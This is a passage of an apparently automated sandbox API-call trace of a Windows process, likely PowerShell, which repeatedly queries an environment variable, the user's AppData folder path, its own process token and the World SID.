| out: pSid=0x25b5c88eec8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.724] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xae4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.724] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.724] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.724] CoTaskMemFree (pv=0x25b73d007a0) [0282.728] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0282.728] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.728] CoTaskMemFree (pv=0x25b73cfa800) [0282.728] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfee20 [0282.728] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfee20 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.728] CoTaskMemFree (pv=0x25b73cfee20) [0282.728] GetCurrentProcess () returned 0xffffffffffffffff [0282.728] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xae8) returned 1 [0282.728] GetTokenInformation (in: TokenHandle=0xae8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.728] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739844f0 [0282.729] GetTokenInformation (in: TokenHandle=0xae8, TokenInformationClass=0x1, TokenInformation=0x25b739844f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739844f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.730] LocalFree (hMem=0x25b739844f0) returned 0x0 [0282.730] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c894c38, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c894c38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.730] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xaec, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.735] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb4c0 [0282.735] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb4c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.735] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.821] ReadFile (in: hFile=0xaf0, lpBuffer=0x25b5c0dca08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c0dca08*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.821] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0282.821] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.821] CoTaskMemFree (pv=0x25b73d00e00) [0282.835] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0282.835] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfdf40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.836] CoTaskMemFree (pv=0x25b73cfdf40) [0282.836] GetCurrentProcess () returned 0xffffffffffffffff [0282.836] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xaf0) returned 1 [0282.836] GetTokenInformation (in: TokenHandle=0xaf0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.836] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984cf0 [0282.836] GetTokenInformation (in: TokenHandle=0xaf0, TokenInformationClass=0x1, TokenInformation=0x25b73984cf0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984cf0, ReturnLength=0x653ef8d6b8) returned 1 [0282.837] LocalFree (hMem=0x25b73984cf0) returned 0x0 [0282.837] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c0e0c00, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c0e0c00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.837] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x7f0, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.838] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.838] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.838] CoTaskMemFree (pv=0x25b73d01680) [0282.845] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01ce0 [0282.845] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.845] CoTaskMemFree (pv=0x25b73d01ce0) [0282.846] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0282.846] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfdf40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.846] CoTaskMemFree (pv=0x25b73cfdf40) [0282.846] GetCurrentProcess () returned 0xffffffffffffffff [0282.846] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xaf4) returned 1 [0282.846] GetTokenInformation (in: TokenHandle=0xaf4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.846] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984c70 [0282.846] GetTokenInformation (in: TokenHandle=0xaf4, TokenInformationClass=0x1, TokenInformation=0x25b73984c70, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984c70, ReturnLength=0x653ef8d6b8) returned 1 [0282.847] LocalFree (hMem=0x25b73984c70) returned 0x0 [0282.847] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c0f3020, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c0f3020*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.847] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xaf8, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.848] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.848] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.848] CoTaskMemFree (pv=0x25b73d007a0) [0282.851] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfca00 [0282.851] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfca00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.851] CoTaskMemFree (pv=0x25b73cfca00) [0282.851] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01680 [0282.851] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01680 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.851] CoTaskMemFree (pv=0x25b73d01680) [0282.851] GetCurrentProcess () returned 0xffffffffffffffff [0282.851] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xafc) returned 1 [0282.851] GetTokenInformation (in: TokenHandle=0xafc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.851] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739847b0 [0282.852] GetTokenInformation (in: TokenHandle=0xafc, TokenInformationClass=0x1, TokenInformation=0x25b739847b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739847b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.852] LocalFree (hMem=0x25b739847b0) returned 0x0 [0282.853] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c0f9068, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c0f9068*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.853] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb00, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.853] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.853] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.853] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.856] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfdf40 [0282.856] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfdf40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.856] CoTaskMemFree (pv=0x25b73cfdf40) [0282.856] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfac40 [0282.856] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfac40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.856] CoTaskMemFree (pv=0x25b73cfac40) [0282.856] GetCurrentProcess () returned 0xffffffffffffffff [0282.856] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb04) returned 1 [0282.856] GetTokenInformation (in: TokenHandle=0xb04, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.856] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984c70 [0282.857] GetTokenInformation (in: TokenHandle=0xb04, TokenInformationClass=0x1, TokenInformation=0x25b73984c70, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984c70, ReturnLength=0x653ef8d6b8) returned 1 [0282.857] LocalFree (hMem=0x25b73984c70) returned 0x0 [0282.858] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c0feaf8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c0feaf8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.858] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb08, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.858] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff260 [0282.858] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff260, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.858] CoTaskMemFree (pv=0x25b73cff260) [0282.861] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb900 [0282.861] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb900, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.861] CoTaskMemFree (pv=0x25b73cfb900) [0282.861] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb4c0 [0282.861] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb4c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.861] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.862] GetCurrentProcess () returned 0xffffffffffffffff [0282.862] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb0c) returned 1 [0282.862] GetTokenInformation (in: TokenHandle=0xb0c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.862] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984970 [0282.862] GetTokenInformation (in: TokenHandle=0xb0c, TokenInformationClass=0x1, TokenInformation=0x25b73984970, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984970, ReturnLength=0x653ef8d6b8) returned 1 [0282.863] LocalFree (hMem=0x25b73984970) returned 0x0 [0282.863] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c105180, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c105180*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.863] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb10, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.863] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01ce0 [0282.864] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.864] CoTaskMemFree (pv=0x25b73d01ce0) [0282.866] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01ce0 [0282.866] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.866] CoTaskMemFree (pv=0x25b73d01ce0) [0282.867] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfc7e0 [0282.867] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfc7e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.867] CoTaskMemFree (pv=0x25b73cfc7e0) [0282.867] GetCurrentProcess () returned 0xffffffffffffffff [0282.867] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb14) returned 1 [0282.867] GetTokenInformation (in: TokenHandle=0xb14, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.867] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984670 [0282.867] GetTokenInformation (in: TokenHandle=0xb14, TokenInformationClass=0x1, TokenInformation=0x25b73984670, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984670, ReturnLength=0x653ef8d6b8) returned 1 [0282.868] LocalFree (hMem=0x25b73984670) returned 0x0 [0282.868] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c10c850, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c10c850*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.868] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb18, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.869] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.869] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.869] CoTaskMemFree (pv=0x25b73d01680) [0282.872] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb4c0 [0282.872] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb4c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.872] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.872] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01680 [0282.872] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01680 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.872] CoTaskMemFree (pv=0x25b73d01680) [0282.872] GetCurrentProcess () returned 0xffffffffffffffff [0282.872] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb1c) returned 1 [0282.872] GetTokenInformation (in: TokenHandle=0xb1c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.872] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984ef0 [0282.872] GetTokenInformation (in: TokenHandle=0xb1c, TokenInformationClass=0x1, TokenInformation=0x25b73984ef0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984ef0, ReturnLength=0x653ef8d6b8) returned 1 [0282.873] LocalFree (hMem=0x25b73984ef0) returned 0x0 [0282.873] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c1130c0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c1130c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.874] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb20, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.874] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0282.874] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.874] CoTaskMemFree (pv=0x25b73cfa3c0) [0282.881] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.881] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.881] CoTaskMemFree (pv=0x25b73d007a0) [0282.881] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe7c0 [0282.881] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe7c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.881] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.881] GetCurrentProcess () returned 0xffffffffffffffff [0282.881] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb24) returned 1 [0282.881] GetTokenInformation (in: TokenHandle=0xb24, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.881] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739842b0 [0282.881] GetTokenInformation (in: TokenHandle=0xb24, TokenInformationClass=0x1, TokenInformation=0x25b739842b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739842b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.882] LocalFree (hMem=0x25b739842b0) returned 0x0 [0282.882] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c118cf0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c118cf0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.882] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb28, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.883] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.883] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.883] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.886] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0282.886] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.886] CoTaskMemFree (pv=0x25b73cfee20) [0282.886] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe7c0 [0282.886] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe7c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.886] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.886] GetCurrentProcess () returned 0xffffffffffffffff [0282.886] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb2c) returned 1 [0282.886] GetTokenInformation (in: TokenHandle=0xb2c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.887] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984df0 [0282.887] GetTokenInformation (in: TokenHandle=0xb2c, TokenInformationClass=0x1, TokenInformation=0x25b73984df0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984df0, ReturnLength=0x653ef8d6b8) returned 1 [0282.887] LocalFree (hMem=0x25b73984df0) returned 0x0 [0282.887] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c11e838, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c11e838*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.888] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb30, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.888] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.888] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.888] CoTaskMemFree (pv=0x25b73d007a0) [0282.891] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff8c0 [0282.891] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff8c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.891] CoTaskMemFree (pv=0x25b73cff8c0) [0282.891] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff260 [0282.891] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff260 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.891] CoTaskMemFree (pv=0x25b73cff260) [0282.891] GetCurrentProcess () returned 0xffffffffffffffff [0282.891] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xb34) returned 1 [0282.891] GetTokenInformation (in: TokenHandle=0xb34, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.892] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739843b0 [0282.892] GetTokenInformation (in: TokenHandle=0xb34, TokenInformationClass=0x1, TokenInformation=0x25b739843b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739843b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.892] LocalFree (hMem=0x25b739843b0) returned 0x0 [0282.892] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c1241b0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c1241b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.893] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xb38, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.893] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.893] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.893] CoTaskMemFree (pv=0x25b73d01680) [0282.895] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff260 [0282.896] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff260, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.896] CoTaskMemFree (pv=0x25b73cff260) [0282.896] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfc3a0 [0282.896] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfc3a0 | out: 